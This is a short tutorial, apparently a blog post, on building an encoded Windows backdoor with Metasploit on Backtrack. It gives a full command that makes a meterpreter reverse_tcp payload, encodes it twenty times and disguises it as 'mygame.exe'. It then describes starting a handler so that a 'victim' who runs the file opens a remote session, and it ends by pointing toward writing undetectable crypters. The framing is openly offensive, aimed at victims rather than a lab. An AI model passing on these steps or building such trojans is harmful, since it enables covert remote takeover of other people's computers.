Backdoors, Metasploit

Create crypted Backdoor with Metasploit and Backtrack

We will use windows/meterpreter/reverse_tcp payload. We will encode payload 10 times with shikata_ga_nai and 10 times with call4_dword_xor.

1. Open console window

2. Type:

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t exe -c 10 -o mygame.exe


3. Run

file mygame.exe

and you will get a response similar to this:
mygame.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

4. To handle incoming connections back to our machine we need to setup the metasploit’s exploit handler. Run


and then do the following:
using metasploit exploit multi handler

5. If your victim executes the malicious file then a meterpreter session will be opened.


Using this method you cannot bypass anti-viruses, most of them will detect your backdoor. Unless your victim has no antivirus installed. To create an undetected (FUD) backdoor you will have to code your own backdoor and crypter from scratch.